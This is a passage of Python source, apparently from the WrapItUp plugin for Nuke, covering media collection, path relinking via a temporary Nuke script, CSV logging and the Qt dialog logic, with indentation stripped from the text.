strText += "\nnuke.pluginAddPath(\'./Collected\')"
else:
strText += '\n\n'
if not root:
if fileName == 'init':
gizmoFolderName = fileTo.split('/')[-2]
strText += '\nnuke.pluginAddPath(\"./' + gizmoFolderName + "\")"
elif fileName == 'menu':
gizmoFolderName = fileTo.split('/')[-2]
strText += "\nnuke.toolbar(\"Nodes\").addCommand(\"Collected/" + gizmoFolderName + "\", \"nuke.createNode('" + gizmoFolderName + ".gizmo')\")"
# write and close
f.write(strText)
f.close()
# write GIZMOS/init.py
if firstInit:
WriteFile('init', True)
# GIZMOS/Collected/init.py
WriteFile('init', False)
#GIZMOS/Collected/menu.py
WriteFile('menu', False)
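# resulting files (sketch, for a collected gizmo named e.g. 'MyGizmo'):
#   GIZMOS/init.py           -> nuke.pluginAddPath('./Collected')
#   GIZMOS/Collected/init.py -> nuke.pluginAddPath('./MyGizmo')
#   GIZMOS/Collected/menu.py -> nuke.toolbar('Nodes').addCommand('Collected/MyGizmo', "nuke.createNode('MyGizmo.gizmo')")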
# relink nuke script
if relinkMethod != -1:
if silent:
print('\n' + WIU_Log + 'Opening temporary Nuke comp in terminal to relink' + (' (relative)' if relinkMethod == 1 else ''))
# quotation mark
q = '\"'
# temp terminal file
filePath = WIU_PackedPath + '/WrapItUp_Temp-RELINK_' + str(relinkMethod) + '.py'
# get nk path
scriptpath = PackedPath(WIU_OtherData[0][0], i= -2 - relinkMethod)
# prepare list of things to do (node name, knob name, new value)
vList = []
# fonts (if needed)
if relinkFonts and fonts:
vList.append([ 'root', 'free_type_font_path', PackedPath(WIU_OtherData[3][0], i=-4, fontFolder=WIU_OtherData[3][0], settingFontPath=True) ]) #font path
# project directory (if needed)
if WIU_ProjectDir:
vList.append([ 'root', 'project_directory', PackedPath('', project_dir = True) ]) #new project directory
# for all media
if media:
for d in WIU_MediaData:
# all knobs should be relinked
n = 0
for eachNode in d[0]:
# do not relink files that aren't copied, or when in project directory
if (silent or (d in WIU_MediaDataNotIgnored)) and not d[6]:
vList.append([eachNode.fullName(), d[1][n], PackedPath( d[3], nodeName=getNodeNames(d[0], us=True), project_dir = d[6] )])
n += 1
# write to pyText
pyText = '# Generated by ' + WIU_Title + '\n#\n# This is a temporary file used to relink nuke scripts. It can be removed.\n\n'
pyText += 'nuke.scriptOpen(' + q + scriptpath + q + ')\n'
for v in vList:
# replace path for relinked relative
if relinkMethod == 1:
v[2] = v[2].replace(os.path.dirname(scriptpath), '[python {nuke.script_directory()}]')
pyText += '\n'
pyText += 'n = nuke.toNode(' + q + v[0] + q + ')\n'
pyText += 'n[' + q + v[1] + q + '].setValue(' + q + v[2] + q + ')\n'
pyText += '\nnuke.scriptSave(' + q + scriptpath + q + ')'
try:
# make py file
f = open(filePath, "w+")
# write
f.write(pyText)
# close
f.close()
license = getLic()
args = [WIU_AppPath, license, '-q', filePath]
subprocess.call(args)
# remove the temporary terminal file
try:
os.remove(filePath)
except Exception as e1:
err += 'Could not remove temporary file for relinking: ' + filePath + '\n' + str(e1) + '\n\n'
# try to remove the autosave file
try:
os.remove(scriptpath + '~')
except Exception as e4:
pass
except Exception as e2:
err += 'Could not write/execute temporary file for relinking: ' + filePath + '\n' + str(e2) + '\n\n'
if silent:
print(WIU_Log + 'End of Nuke block' + '\n')
return err
except Exception as e3:
return str(e3)
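# relink sketch (hypothetical names): the temporary python file written above looks roughly like
#   nuke.scriptOpen("<packed>/comp_RELINKED.nk")
#   n = nuke.toNode("Read1")
#   n["file"].setValue("<packed>/MEDIA/Read1/sh010/scan/plate.####.exr")
#   nuke.scriptSave("<packed>/comp_RELINKED.nk")
# and is executed as: <WIU_AppPath> -t -q WrapItUp_Temp-RELINK_0.py (or -ti, depending on the license setting)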
# read comp
def Refresh():
window.setEnabled(False)
WTotalProgress.setVisible(True)
threading.Thread(target=RefreshThreaded, args=()).start()
# threaded refresh
def RefreshThreaded():
global WIU_MediaData
global WIU_OtherData
# get all paths and information from the current comp
WIU_MediaData = ReadCompMediaData()
WIU_OtherData = ReadCompOtherData()
# if silent, update ui
if not silent:
nuke.executeInMainThread(RefreshUI, args=())
# if not, return all data for silent mode
else:
refreshRtn = RefreshUI()
return refreshRtn
# apply read data to WrapItUp window
def RefreshUI():
global WIU_MediaData
global WIU_OtherData
global WIU_SilentReturn
global WIU_SilentList
# if silent, return this list
WIU_SilentReturn = []
if not silent:
# clear list
WListCopyPaths.clear()
WListIgnorePaths.clear()
# close if comp has not been saved
if not WIU_OtherData:
return
# list count
iCopy = 0
item = "nk\t\t" + WIU_OtherData[0][0].split('/')[-1] if not silent else "nk\t\t\t\t" + WIU_OtherData[0][0].split('/')[-1]
if not silent:
# add current nuke script to copy list
WListCopyPaths.addItem(item)
WListCopyPaths.item(iCopy).setData(QtCore.Qt.UserRole, -1)
WListCopyPaths.item(iCopy).setForeground(QtGui.QColor(150, 150, 150))
iCopy += 1
else:
WIU_SilentList.append([item, -1])
WIU_SilentReturn.append(item)
iCopy += RelinksInList()
iCopy += AddOnsInList()
# go through each found fileknob value
iIgnore = 0
i = 0
for dataItem in WIU_MediaData:
# check if the path exists
existsBool = dataItem[2]
exists = '' if existsBool else 'MISSING: '
# make an item for the list
nodeName = getNodeNames(dataItem[0])
extraTab = '\t' if len(nodeName) < 13 else ''
item = exists + nodeName + '\t' + extraTab + dataItem[3] if not silent else exists + nodeName + '\t\t' + extraTab + dataItem[3]
if not silent:
# add to the right list
if(existsBool):
# add item
WListCopyPaths.addItem(item)
# add data to item
WListCopyPaths.item(iCopy).setData(QtCore.Qt.UserRole, i)
# count
iCopy += 1
else:
# add item
WListIgnorePaths.addItem(item)
# add data to item
WListIgnorePaths.item(iIgnore).setData(QtCore.Qt.UserRole, i)
# grayed out colours
WListIgnorePaths.item(iIgnore).setForeground(QtGui.QColor(150, 150, 150))
# count
iIgnore += 1
else:
if existsBool:
WIU_SilentList.append([item, i])
WIU_SilentReturn.append(item)
# overall count
i += 1
if not silent:
UpdateTotalSize()
WTotalProgress.setVisible(False)
window.setEnabled(True)
else:
UpdateTotalSize()
if startnow:
StartCopyRtn = StartCopy()
return StartCopyRtn
else:
return WIU_SilentReturn
# move item from copy to ignore
def SendToIgnore():
for eachSelectedItem in WListCopyPaths.selectedItems():
# only copy over if allowed
selI = eachSelectedItem.data(QtCore.Qt.UserRole)
if selI >= 0:
WListCopyPaths.takeItem(WListCopyPaths.row(eachSelectedItem))
WListIgnorePaths.addItem(eachSelectedItem)
UpdateTotalSize()
# move item from ignore to copy
def SendToCopy():
for eachSelectedItem in WListIgnorePaths.selectedItems():
# get data
selI = eachSelectedItem.data(QtCore.Qt.UserRole)
selData = WIU_MediaData[selI]
selExists = selData[2]
# only copy over if it exists
if selExists:
WListIgnorePaths.takeItem(WListIgnorePaths.row(eachSelectedItem))
WListCopyPaths.addItem(eachSelectedItem)
UpdateTotalSize()
# update total file size count
def UpdateTotalSize():
global WIU_TotalSize
# add up all data from each item in the copy list
WIU_TotalSize = 0
itemLen = WListCopyPaths.count() if not silent else len(WIU_SilentList)
for i in range(itemLen):
itemData = WListCopyPaths.item(i).data(QtCore.Qt.UserRole) if not silent else WIU_SilentList[i][1]
Media = False
if itemData >= 0:
Media = True
if Media:
for eachFile in WIU_MediaData[itemData][4]:
WIU_TotalSize += eachFile[1]
else:
WIU_TotalSize += WIU_OtherData[abs(itemData)-1][1]
# set label
if not silent:
WTotalCopySize.setText( BytesToString(WIU_TotalSize) )
# selection changed on copy list
def CopyListSelectionChanged():
WListIgnorePaths.clearSelection()
UpdateLabels(True)
# selection changed on ignore list
def IgnoreListSelectionChanged():
WListCopyPaths.clearSelection()
UpdateLabels(False)
# shortens a long path to '...' plus its last iChars characters if it is too long
def shortenPath(strPath, iChars):
newPath = '...' + strPath[-iChars:]
short = False
if len(strPath) > iChars:
short = True
return newPath if short else strPath
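# example: shortenPath('/very/long/path/to/file.exr', 10) returns '...o/file.exr'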
# convert a list of nodes to a string of node names - list of nodes, underscore, item index (for data check)
def getNodeNames(nodeList, us = False, i = 0):
strNodes = ''
for eachNode in nodeList:
strNodes += (eachNode.fullName() if (i <= -5 or i >= 0) else eachNode) + ('_' if us else ' ')
strNodes = strNodes[:-1]
return strNodes
# convert a list of knobs to a string of node names - list of knobs, underscore
def getKnobNames(knobList, us = False):
strKnobs = ''
for eachKnob in knobList:
strKnobs += eachKnob + ('_' if us else ' ')
strKnobs = strKnobs[:-1]
return strKnobs
# update the labels underneath the lists
def UpdateLabels(CopyList):
# disable button
WGoToNode.setEnabled(False)
# get all selected objects
sel = []
if(CopyList):
sel = WListCopyPaths.selectedItems()
else:
sel = WListIgnorePaths.selectedItems()
if len(sel) == 1:
# get last selected object
selVal = sel[0]
# get data index
selI = selVal.data(QtCore.Qt.UserRole)
# set data
selData = []
selOtherData = []
Media = False
if selI >= 0:
Media = True
curritempath = ''
packeditempath = ''
curritemfiles = ''
curritemsize = 0
# get media data
if(Media):
selData = WIU_MediaData[selI]
curritempath = selData[3]
packeditempath = PackedPath( curritempath, nodeName=getNodeNames(selData[0], us=True), project_dir = selData[6] )
curritemfiles = str( len(selData[4]) )
curritemsize = selData[5]
WGoToNode.setToolTip( getNodeNames(selData[0], us=False) )
WGoToNode.setEnabled(True)
# project directory prefix
if(selData[6]):
curritempath = ProjectDirectory(curritempath)
# get other data
else:
# convert selI to positive integers, matching to the data array
selIConverted = abs(selI) - 1
# get data
selData = WIU_OtherData[selIConverted]
curritempath = selData[0]
packeditempath = PackedPath(curritempath, i = selI)
curritemfiles = '1'
# set amount of files for fonts
if selI == -4:
curritemfiles = str(len(selData[2]))
packeditempath = WIU_PackedPath + '/' + curritempath[:-1].split('/')[-1]
curritemsize = selData[1]
# TCL eval
curritempath = evalTCL(curritempath)
# set label texts and tooltips
labelLength = 100
# get shortened path
curritempathShortened = shortenPath(curritempath, labelLength)
# set as text
WCurrItemPath.setText(curritempathShortened)
# set full path as tooltip
WCurrItemPath.setToolTip(curritempath)
# get shortened path
packeditempathShortened = shortenPath(packeditempath, labelLength)
# set as text
WPackedItemPath.setText(packeditempathShortened)
# set full path as tooltip
WPackedItemPath.setToolTip(packeditempath)
WCurrItemFiles.setText(curritemfiles)
WCurrItemSize.setText( BytesToString(curritemsize) )
WIgnoredLabel.setVisible(not CopyList)
WGoToFolder.setEnabled(True)
else:
selectItemStr = '-'
WCurrItemPath.setText(selectItemStr)
WPackedItemPath.setText(selectItemStr)
WCurrItemFiles.setText(selectItemStr)
WCurrItemSize.setText(selectItemStr)
WIgnoredLabel.setVisible(False)
WGoToFolder.setEnabled(False)
# update the labels underneath the lists
def UpdateItemInfo(n = False, pd = False):
global WIU_ParentDirCount
global WIU_NodeNameFolder
if pd:
WIU_ParentDirCount = WParentDirectories.value()
if n:
WIU_NodeNameFolder = WNodeNameFolder.isChecked()
# check which list the currently selected item is in, and update its info
if WIgnoredLabel.isVisible():
IgnoreListSelectionChanged()
else:
CopyListSelectionChanged()
# on packed path changed
def PackedPathChanged():
# allow editing of global
global WIU_PackedPath
# update WIU_PackedPath
WIU_PackedPath = WPackedPath.text()
UpdateItemInfo()
# arguments are switches for relink and relink, relative
def RelinksInList(r = False, rr = False):
global WIU_Relink
global WIU_RelinkRelative
if not silent:
if r:
WIU_Relink = not WIU_Relink
if rr:
WIU_RelinkRelative = not WIU_RelinkRelative
# get each item
i = 0
while i < WListCopyPaths.count():
# get data
d = WListCopyPaths.item(i).data(QtCore.Qt.UserRole)
# delete if relink
if d == -2 or d == -3:
WListCopyPaths.takeItem(i)
i = 0
else:
i += 1
# if no UI
else:
WIU_Relink = relinked
WIU_RelinkRelative = relativerelinked
iCopyCount = 0
# add current nuke script to copy list, this time relative relinked
if WIU_RelinkRelative:
item = "nk (relative relinked)\t" + WIU_OtherData[0][0].split('/')[-1]
if not silent:
index = 1
WListCopyPaths.insertItem(index, item)
WListCopyPaths.item(index).setData(QtCore.Qt.UserRole, -3)
WListCopyPaths.item(index).setForeground(QtGui.QColor(150, 150, 150))
iCopyCount += 1
else:
WIU_SilentList.append([item, -3])
WIU_SilentReturn.append(item)
# add current nuke script to copy list, this time relinked
if WIU_Relink:
item = "nk (relinked)\t\t" + WIU_OtherData[0][0].split('/')[-1]
if not silent:
index = 1
WListCopyPaths.insertItem(index, item)
WListCopyPaths.item(index).setData(QtCore.Qt.UserRole, -2)
WListCopyPaths.item(index).setForeground(QtGui.QColor(150, 150, 150))
iCopyCount += 1
else:
WIU_SilentList.append([item, -2])
WIU_SilentReturn.append(item)
# for refresh function item count
return iCopyCount
# show/hide addon items in list, arguments for toggles
def AddOnsInList(f = False, g = False):
global WIU_Gizmo
global WIU_Fonts
if not silent:
if g:
WIU_Gizmo = not WIU_Gizmo
if f:
WIU_Fonts = not WIU_Fonts
# remove all addon items
i = 0
while i < WListCopyPaths.count():
d = WListCopyPaths.item(i).data(QtCore.Qt.UserRole)
if d <= -4:
WListCopyPaths.takeItem(i)
i = 0
else:
i += 1
# if no UI is loaded
else:
WIU_Gizmo = gizmos
WIU_Fonts = fonts
iCopyCount = 0
# determine index of items
index = 1
if not silent:
if WRelativeRelink.isChecked():
index += 1
if WRelinkPaths.isChecked():
index += 1
if WIU_Gizmo:
# iterate through all items in WIU_OtherData, except for the first 4 (0 - 3, which are nuke script, - relinked, - relinked relative, font)
for eachGizmo in range(len(WIU_OtherData) - 4):
item = "gizmo\t\t" + WIU_OtherData[4 + eachGizmo][0] if not silent else "gizmo\t\t\t" + WIU_OtherData[4 + eachGizmo][0]
if not silent:
WListCopyPaths.insertItem(index, item)
WListCopyPaths.item(index).setData(QtCore.Qt.UserRole, -5 - eachGizmo)
WListCopyPaths.item(index).setForeground(QtGui.QColor(150, 150, 150))
iCopyCount += 1
else:
WIU_SilentList.append([item, -5 - eachGizmo])
WIU_SilentReturn.append(item)
FontPathExists = os.path.isdir(WIU_OtherData[3][0])
if WIU_Fonts and FontPathExists:
item = "font folder\t\t" + WIU_OtherData[3][0] if not silent else "font folder\t\t\t" + WIU_OtherData[3][0]
if not silent:
WListCopyPaths.insertItem(index, item)
WListCopyPaths.item(index).setData(QtCore.Qt.UserRole, -4)
WListCopyPaths.item(index).setForeground(QtGui.QColor(150, 150, 150))
iCopyCount += 1
else:
WIU_SilentList.append([item, -4])
WIU_SilentReturn.append(item)
# for refresh function item count
return iCopyCount
def ChoosePackedPath():
# open nuke file dialog
chosenPath = nuke.getFilename('WrapItUp - choose the folder to copy the script and all media to')
if chosenPath is not None:
# make sure it is an existing folder
if os.path.isfile(chosenPath):
chosenPath = os.path.dirname(chosenPath)
# cut off the last / if it is there
if chosenPath.endswith('/'):
chosenPath = chosenPath[:-1]
# set value to text knob
if os.path.isdir(chosenPath):
# set packed path
WPackedPath.setText(chosenPath)
# path does not exist, ask to create the folders instead
else:
q = nuke.ask('Path does not exist:\n\n' + chosenPath + '\n\nDo you want to choose this path anyway? Any non-existing folders will be created when files are copied.')
if q:
if chosenPath.endswith('/'):
chosenPath = chosenPath[:-1]
WPackedPath.setText(chosenPath)
# regain focus on form
window.activateWindow()
# function to control buttons on form
def ButtonsAllowed(YesOrNo):
# disable all buttons that could interfere (except for the interrupt button of course)
WSendToCopy.setEnabled(YesOrNo)
WSendToIgnore.setEnabled(YesOrNo)
WStart.setEnabled(YesOrNo)
WRefresh.setEnabled(YesOrNo)
WParentDirectories.setEnabled(YesOrNo)
WRelinkPaths.setEnabled(YesOrNo)
WRelativeRelink.setEnabled(YesOrNo)
WNodeNameFolder.setEnabled(YesOrNo)
WPackedPath.setEnabled(YesOrNo)
WChoosePackedPathButton.setEnabled(YesOrNo)
WLParentDirectories.setEnabled(YesOrNo)
WLPath.setEnabled(YesOrNo)
WContinueOnError.setEnabled(YesOrNo)
WCSVSeparator.setEnabled(YesOrNo)
WLCSVSeparator.setEnabled(YesOrNo)
WLicense.setEnabled(YesOrNo)
WLLicense.setEnabled(YesOrNo)
WExitOnFinish.setEnabled(YesOrNo)
WCopyFontDir.setEnabled(YesOrNo)
WCopyGizmos.setEnabled(YesOrNo)
# make progress bar visible
WTotalProgress.setVisible(not YesOrNo)
WItemProgress.setVisible(not YesOrNo)
WCurrentCopyItem.setVisible(not YesOrNo)
# prepare list to copy
def PrepareCopy():
global WIU_TotalSize
global WIU_SilentList
global WIU_MediaDataNotIgnored
# bool for ProcessFiles
relinkFonts = False
# get all items in data list
itemsToCopy = []
listLen = WListCopyPaths.count() if not silent else len(WIU_SilentList)
for i in range(listLen):
# get index
dataItem = 0
if not silent:
dataItem = WListCopyPaths.item(i).data(QtCore.Qt.UserRole)
else:
dataItem = WIU_SilentList[i][1]
# assign custom data for nuke script to item
# make list with item index and data combined, so the index does not get lost
if(dataItem < 0):
itemsToCopy.append( [dataItem, WIU_OtherData[abs(dataItem) - 1]] )
# all other media files
else:
itemsToCopy.append( [dataItem, WIU_MediaData[dataItem]] )
# store this index for relinking only relevant media
WIU_MediaDataNotIgnored.append(WIU_MediaData[dataItem])
# get all files involved
fileList = []
i = 0
addedSizes = 0.0
for j in itemsToCopy:
# index, data
k = j[0]
l = j[1]
# media
if k >= 0 and media:
# item size
itemSizeCounting = 0
# get list of each file, file size
for eachFileS in l[4]:
# get path of destination file path
eachFileTo = PackedPath(eachFileS[0], nodeName = getNodeNames(l[0], us = True), project_dir = l[6])
# count sizes together
itemSizeCounting += eachFileS[1]
# single files of 0 bytes should still be copied (even though it does not make sense to have them in your script), make them 1 byte for progress bar
currSize = l[5] if int(l[5]) > 0 else 1
# get ratio for progress bar %
sequenceSizeRatio = int (float(itemSizeCounting) / float(currSize) * 100)
# set file, file path to copy to, list item index, file size in bytes, size ratio within sequence for progress bar, nodes, knobs, original index
fileList.append([ eachFileS[0], eachFileTo, i, eachFileS[1], sequenceSizeRatio, l[0], l[1], k ])
# nuke script
if k == -1:
filePath = l[0]
fileSize = l[1]
fileTo = PackedPath(filePath, i = k)
fileList.append([ filePath, fileTo, i, fileSize, 100, ['root'], ['name'], k ])
# nuke script relinked
if k == -2:
filePath = l[0]
fileSize = l[1]
fileTo = PackedPath(filePath, i = k)
fileList.append([ filePath, fileTo, i, fileSize, 100, ['root'], ['name'], k ])
# nuke script relinked relative
if k == -3:
filePath = l[0]
fileSize = l[1]
fileTo = PackedPath(filePath, i = k)
fileList.append([ filePath, fileTo, i, fileSize, 100, ['root'], ['name'], k ])
# font directory
if k == -4:
# set bool
relinkFonts = True
# item size
itemSizeCounting = 0
# get each font, size combination
for eachFileS in l[2]:
# get path of destination file path
if l[0].endswith('/'):
l[0] = l[0][:-1]
eachFileTo = PackedPath(eachFileS[0], i = k, fontFolder = l[0])
# count sizes together
itemSizeCounting += eachFileS[1]
# progress bar value as a percentage of the total font folder size (use 1 if the total is 0 to avoid division by zero)
maxVal = float(l[1])
maxVal = 1 if maxVal == 0 else maxVal
sequenceSizeRatio = int(float(itemSizeCounting) / maxVal * 100)
# set file, file path to copy to, list item index, file size in bytes, size ratio within sequence for progress bar, nodes, knobs, original index
fileList.append( [eachFileS[0], eachFileTo, i, eachFileS[1], sequenceSizeRatio, ['root'], ['free_type_font_path'], k] )
# gizmo
if k <= -5:
filePath = l[0]
fileSize = l[1]
nodes = l[2]
fileTo = PackedPath(filePath, i = k)
fileList.append([ filePath, fileTo, i, fileSize, 100, nodes, ['-'], k ])
# count
i += 1
return [fileList, relinkFonts]
# function to append text to log file
def WriteLog(logText, first = False):
# which file
filePath = WIU_PackedPath + '/log.csv'
# try to remove it if logging just started
if first:
try:
os.remove(filePath)
except Exception as e:
pass
try:
# open file
f = open(filePath, "a+")
# write and close
f.write(logText + '\n')
f.close()
except Exception as e:
pass
# convert data to CSV format
def CSV(values):
CSVtext = ''
csv = WCSVSeparator.currentText() if not silent else (',' if csvcommas else ';')
for d in values:
CSVtext += '\"' + str(d) + '\"' + (csv)
return CSVtext
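# output example: CSV(['12:00', 'FAILED', '/a.exr']) with the ';' separator returns '"12:00";"FAILED";"/a.exr";'
# (the trailing separator is simply carried along in the log file)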
def getLic():
license = WLicense.currentText() if not silent else ('-ti' if licinteractive else '-t')
return license
# threaded function for copying/relinking - list of files to process with all necessary data, fonts should be relinked (bool)
def ThreadedCopy(fileList, relinkFonts):
# error count
totalErrorCount = 0
# count size
totalSizeCount = 0
totalSizeStored = WIU_TotalSize
listCount = (WListCopyPaths.count() if not silent else len(WIU_SilentList)) - 1
# write first lines of log
nukever = str(nuke.NUKE_VERSION_STRING)
nukescript = nuke.root().name() if not silent else nk
params = CSV(["Used command-line/python function", str(silent)]) + '\n' + CSV(["Script path", nukescript]) + '\n' + CSV(["Folders with node names", str(WIU_NodeNameFolder)]) + '\n' + CSV(["Parent directory count", str(WIU_ParentDirCount)]) + '\n' + CSV(["Relinked", str(WIU_Relink)]) + '\n' + CSV(["Relative relinked", str(WIU_RelinkRelative)]) + '\n' + CSV(["Fonts", str(WIU_Fonts)]) + '\n' + CSV(["Gizmos", str(WIU_Gizmo)]) + '\n' + CSV(["License", 'nuke_i' if getLic() == '-ti' else 'nuke_r'])
WriteLog( WIU_Title + '\n' + 'Nuke version: ' + nukever + '\n\n' + params + '\n\n\n' + CSV(['TIME', 'STATUS', 'FILE (FROM)', 'FILE (TO)', 'NODE', 'KNOB', 'SIZE', 'RETURN']) + '\n', first = True )
# copy files
prevI = -1
firstInit = True
i = 0
iM = len(fileList)
c = False
lastItemFailed = False
for f in fileList:
# get current time
timestr = time.strftime("%c")
# interrupt check
if WIU_Interrupted:
WriteLog( CSV([timestr, 'PROCESS WAS CANCELLED BY USER']) )
nuke.executeInMainThread(Finished, args=('USER'))
sys.exit()
relinkMethod = 0 if f[7] == -2 else (1 if f[7] == -3 else -1) # 0 if relink, 1 if relink relative, -1 if none
suffix = ' copy/relink' if relinkMethod != -1 else '' # suffix for relinked nk scripts
labelText = shortenPath(f[0] + suffix, 20) # get shorter path for current copying file, add suffix
if not silent:
# set label text
nuke.executeInMainThread(SetCurrCopyItemLabel, args=(labelText, f[0]))
# set working colour
nuke.executeInMainThread(ChangeItemColour, args = (f[2], True))
else:
# append size to label text for console
labelText += ' (' + BytesToString(f[3]) + ')'
# start process
writeInit = f[7] <= -5 # True if in gizmo range of list
result = ProcessFile(f[0], f[1], writeInit, firstInit, relinkMethod, relinkFonts)
if writeInit:
firstInit = False
# add to size count
totalSizeCount += f[3]
# write log
if result == '':
WriteLog( CSV([timestr, 'SUCCESS', f[0], f[1], getNodeNames(f[5], i=f[7]), getKnobNames(f[6]), BytesToString(f[3])]) )
# make green
if(f[2] > prevI):
if not silent:
if not lastItemFailed:
nuke.executeInMainThread(ChangeItemColour, args = (prevI, False, True))
nuke.executeInMainThread(ChangeItemColour, args = (f[2], False, True))
lastItemFailed = False
prevI = f[2]
# on error
else:
WriteLog( CSV([timestr, 'FAILED', f[0], f[1], getNodeNames(f[5], i=f[7]), getKnobNames(f[6]), BytesToString(f[3]), result]) )
if not silent:
if not WContinueOnError.isChecked():
nuke.executeInMainThread(Finished, args = ([f[0] + '\n\n' + result]))
# make red
if(f[2] > prevI):
nuke.executeInMainThread(ChangeItemColour, args = (f[2], False, False))
lastItemFailed = True
prevI = f[2]
totalErrorCount += 1
# set total progress bar
sizeRatio = float( totalSizeCount ) / float( totalSizeStored )
progressVal = int( sizeRatio * 100 )
# set item progress bar
if not silent:
nuke.executeInMainThread(ItemProgressUpdate, args = (f[4]))
nuke.executeInMainThread(TotalProgressUpdate, args = (progressVal))
# print progress
else:
if not (f[7] <= -1 and f[7] >= -3):
if not c:
c = True
print('')
if i == iM - 1:
labelText = ' '
sys.stdout.write(WIU_Log + "Copying files: %d%% \t %s \r" % (progressVal, labelText) )
sys.stdout.flush()
i += 1
WriteLog( CSV([timestr, 'FINISHED!']) )
if not silent:
nuke.executeInMainThread(Finished, args = ('' if totalErrorCount == 0 else '.'))
else:
print('\n\n\n' + WIU_Log + (('Finished! No errors. Out folder path:\n' + WIU_Log + out) if totalErrorCount == 0 else 'Finished copying! There were some errors. Check the log in the out folder:\n' + WIU_Log + out))
# set current copy item texts
def SetCurrCopyItemLabel(strText, strToolTip):
WCurrentCopyItem.setText(strText)
WCurrentCopyItem.setToolTip(strToolTip)
# total progress bar update on main thread
def TotalProgressUpdate(NewValue):
WTotalProgress.setValue(NewValue)
# item progress bar update on main thread
def ItemProgressUpdate(NewValue):
WItemProgress.setValue(NewValue)
# progress bar update on main thread
def ChangeItemColour(i, loading, Succeeded=False):
C = []
if Succeeded:
C = [0, 255, 0]
else:
if loading:
C = [255, 215, 0]
else:
C = [255, 0, 0]
# 'disabled' colour
d = WListCopyPaths.item(i).data(QtCore.Qt.UserRole)
if d < 0 and not loading:
C = [round(C[0]*.5), round(C[1]*.5), round(C[2]*.5)]
WListCopyPaths.item(i).setForeground(QtGui.QColor(C[0], C[1], C[2]))
# function to call on finish
def Finished(isError):
global WIU_Interrupted
global WIU_Copying
WIU_Interrupted = False
WIU_Copying = False
# exit window when not interrupted by user and exit on finish is enabled
if ((isError != 'USER') and (WExitOnFinish.isChecked())):
# do not ask to save script
try:
nuke.toNode('root').setModified(False)
except Exception as e:
pass
# exit
nuke.scriptExit()
else:
if(isError == ''):
window.close()
nuke.message("Finished copying! There were no errors.\nThe folder will open now.")
OpenFolder(WIU_PackedPath)
elif(isError == '.'):
window.close()
nuke.message("Finished copying! There were some errors.\nThe folder will open now, see the log file for details!")
OpenFolder(WIU_PackedPath)
elif(isError == 'USER'):
nuke.message("Copying cancelled! The folder will open now.")
window.activateWindow()
OpenFolder(WIU_PackedPath)
WInterrupt.setEnabled(True)
ButtonsAllowed(True)
Refresh()
else:
nuke.message("ERROR: " + isError + '\n\nSee ./log.txt for more information.')
WInterrupt.setEnabled(True)
ButtonsAllowed(True)
window.activateWindow()
OpenFolder(WIU_PackedPath)
Refresh()
# open folder
def OpenFolder(folderPath = ''):
if folderPath == '':
folderPath = WCurrItemPath.toolTip()
oFolderPath = folderPath
try:
# get parent dir
if not os.path.isdir(folderPath):
folderPath = os.path.dirname(folderPath)
# get project directory folder
if not os.path.isdir(folderPath):
folderPath = ProjectDirectory(oFolderPath)
if os.path.isdir(folderPath):
if sys.platform == 'win32':
folderPath = folderPath.replace('/', '\\')
os.startfile(folderPath)
else:
opener ="open" if sys.platform == "darwin" else "xdg-open"
subprocess.call([opener, folderPath])
else:
print(folderPath)
except Exception as e:
pass
def ToNode():
# select the nodes
for i in nuke.allNodes():
try:
i.setSelected(False)
except Exception as e:
pass
for eachNode in WGoToNode.toolTip().split(' '):
n = nuke.toNode(eachNode)
try:
n.setSelected(True)
except Exception as e:
pass
# zoom
nuke.zoomToFitSelected()
# start copy
def StartCopy():
global WIU_Copying
global WIU_PackedPath
# check
q = True
if not silent:
q = nuke.ask("Start copying " + WTotalCopySize.text() + '?\n' + 'Destination: ' + WIU_PackedPath + '\nAny existing files will be overwritten.')
window.activateWindow()
# set out folder
else:
WIU_PackedPath = out
if q:
# disable ui
if not silent:
ButtonsAllowed(False)
# get list to copy
preparedCopy = PrepareCopy()
fileList = preparedCopy[0]
relinkFonts = preparedCopy[1]
if not silent:
# run process on different thread
threading.Thread(target=ThreadedCopy, args=([fileList, relinkFonts])).start()
else:
# run threaded copy on main thread in terminal
ThreadedCopy(fileList, relinkFonts)
WIU_Copying = True
if silent:
return WIU_SilentReturn
# interrupt
def StopCopy():
global WIU_Interrupted
global WIU_Copying
# check
if WIU_Copying:
question = "Are you sure you want to cancel?"
q = nuke.ask(question)
window.activateWindow()
if q:
WCurrentCopyItem.setText("<font color='red'>Cancelling...</font>")
WCurrentCopyItem.setToolTip('Waiting for the current file copy to complete before stopping the copy process.')
WIU_Interrupted = True
WInterrupt.setEnabled(False)
else:
window.close()
# open root folder
def GoToRootFolder():
if not WIU_PackedPath == '':
OpenFolder(WIU_PackedPath)
# catch window closing if the rejected button was not pressed
def exitForm():
if WIU_Copying:
window.show()
# show ui if not silent mode
if not silent:
window = QtWidgets.QDialog()
ui = Ui_Dialog()
ui.setupUi(window)
# define widgets
WLPath = window.findChild(QtWidgets.QLabel, "LPath")
WPackedPath = window.findChild(QtWidgets.QLineEdit, "PackedPath")
WGoToRootFolder = window.findChild(QtWidgets.QPushButton, "GoToRootFolder")
WChoosePackedPathButton = window.findChild(QtWidgets.QPushButton, "ChoosePackedPathButton")
WSendToIgnore = window.findChild(QtWidgets.QPushButton, "SendToIgnore")
WSendToCopy = window.findChild(QtWidgets.QPushButton, "SendToCopy")
WRefresh = window.findChild(QtWidgets.QPushButton, "Refresh")
WGoToFolder = window.findChild(QtWidgets.QPushButton, "GoToFolder")
WGoToNode = window.findChild(QtWidgets.QPushButton, "GoToNode")
WListCopyPaths = window.findChild(QtWidgets.QListWidget, "ListCopyPaths")
WListIgnorePaths = window.findChild(QtWidgets.QListWidget, "ListIgnorePaths")
WRelinkPaths = window.findChild(QtWidgets.QCheckBox, "RelinkPaths")
WRelativeRelink = window.findChild(QtWidgets.QCheckBox, "RelativeRelink")
WNodeNameFolder = window.findChild(QtWidgets.QCheckBox, "NodeNameFolder")
WParentDirectories = window.findChild(QtWidgets.QSpinBox, "ParentDirectories")
WLParentDirectories = window.findChild(QtWidgets.QLabel, "LParentDirectories")
WCopyFontDir = window.findChild(QtWidgets.QCheckBox, "CopyFontDir")
WCopyGizmos = window.findChild(QtWidgets.QCheckBox, "CopyGizmos")
WContinueOnError = window.findChild(QtWidgets.QCheckBox, "ContinueOnError")
WExitOnFinish = window.findChild(QtWidgets.QCheckBox, "ExitOnFinish")
WCSVSeparator = window.findChild(QtWidgets.QComboBox, "CSVSeparator")
WLCSVSeparator = window.findChild(QtWidgets.QLabel, "LCSVSeparator")
WLicense = window.findChild(QtWidgets.QComboBox, "License")
WLLicense = window.findChild(QtWidgets.QLabel, "LLicense")
